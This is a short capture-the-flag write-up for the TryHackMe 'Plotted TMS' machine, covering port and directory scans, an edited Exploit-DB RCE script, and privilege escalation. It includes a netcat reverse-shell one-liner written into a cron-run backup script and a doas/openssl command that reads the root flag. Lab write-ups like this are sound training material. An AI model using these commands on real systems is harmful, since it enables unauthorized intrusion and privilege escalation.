Plotted TMS

You can find this machine here : https://tryhackme.com/room/plottedtms

Port Scan

1 2 3 4 5 6 7

┌──(kali㉿Zeus)-[~] └─$ sudo nmap -sS -sV 10.10.1.194 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 445/tcp open http Apache httpd 2.4.41 ((Ubuntu))

Directory Scan Port 445

1 2 3 4 5 6 7 8 9 10

┌──(kali㉿Zeus)-[~] └─$ dirb http://10.10.1.194:445 <snip> ==> DIRECTORY: http://10.10.1.194:445/management/ ==> DIRECTORY: http://10.10.1.194:445/management/admin/ ==> DIRECTORY: http://10.10.1.194:445/management/assets/ ==> DIRECTORY: http://10.10.1.194:445/management/build/ ==> DIRECTORY: http://10.10.1.194:445/management/classes/ ==> DIRECTORY: http://10.10.1.194:445/management/database/ <snip>

Traffic Offense Management System - Remote Code Execution (RCE) (Unauthenticated)

1 2 3

locate php/webapps/50221.py cp /usr/share/exploitdb/exploits/php/webapps/50221.py . 2to3 -w 50221.py

There was an error with the script so i edit the line 107

• before

1	request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers)

• after

1	request = requests.post("http://10.10.1.194:445"+find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers)

RCE Confirmed

Privileges Escalation - User Owned

• Change the backup.sh content

1 2 3 4

rm -rf backup.sh echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.18.45.56 5555 >/tmp/f" > backup.sh chmod 777 backup.sh chmod +x backup.sh

Privileges Escalation - Root Owned

1 2 3 4

plot_admin@plotted:~$ find / -perm -u=s -type f 2>/dev/null <snip> /usr/bin/doas <snip>

• Resource : https://book.hacktricks.xyz/linux-unix/privilege-escalation#doas
• Resource : https://gtfobins.github.io/gtfobins/openssl/#file-read

1	permit nopass plot_admin as root cmd openssl

1 2	LFILE=/root/root.txt doas -u root openssl enc -in "$LFILE"